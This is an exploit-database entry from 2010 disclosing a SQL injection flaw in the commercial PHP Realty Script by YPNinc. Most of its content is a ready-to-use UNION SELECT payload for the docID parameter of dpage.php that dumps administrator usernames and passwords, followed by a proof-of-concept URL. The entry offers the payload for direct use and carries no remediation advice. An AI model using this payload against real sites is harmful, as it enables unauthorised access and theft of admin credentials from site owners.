YPNinc PHP Realty Script (docID) SQL Injection Vulnerability

2010-06-29T00:00:00
ID 1337DAY-ID-13056
Type zdt
Reporter v3n0m
Modified 2010-06-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ============================================================
YPNinc PHP Realty Script (docID) SQL Injection Vulnerability
============================================================


Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : June, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : PHP Realty Script
Vendor      : http://www.ypninc.com/
Price       : $89.95
----------------------------------------------------------------
 
Exploit:
~~~~~~~
-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin--
 
Poc:
~~~~~~~
 
http://127.0.0.1/[path]/dpage.php?docID=[SQLi]
 
----------------------------------------------------------------



#  0day.today [2018-02-17]  #